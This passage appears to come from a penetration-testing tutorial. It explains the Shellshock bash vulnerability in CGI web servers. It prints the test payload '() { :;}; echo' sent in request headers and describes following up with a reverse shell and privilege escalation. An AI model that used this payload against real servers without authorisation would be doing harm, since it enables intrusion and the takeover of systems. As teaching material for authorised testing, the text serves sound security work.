In the first five steps, we discovered that there was a call to a shell script and, as it should have been run by a shell interpreter, it may have been bash or a vulnerable version of bash.
To verify that, we performed the following test:

() { :;}; echo "Vulnerable:" 

The first part, () { :;};, is an empty function definition since bash can store functions as environment variables, and this is the core of the vulnerability, as the parser keeps interpreting (and executing) the commands after the function ends. This allows us to issue the second part, echo "Vulnerable:", a command that simply returns and echoes what it is given as input.

The vulnerability occurs in the web server because the CGI implementation maps all the parts of a request to environment variables, so this attack also works if done over User-Agent or Accept-Language instead of referer. Once we know the server is vulnerable, we issue a test command, ifconfig, and set up a reverse shell.

A reverse shell is a remote shell that has the particular characteristic of being initiated by the server so that the client listens for a connection instead of the server waiting for a client to connect, as in a bind connection.

Once we have a shell to the server, we need to escalate privileges and get the information needed to help with our penetration test.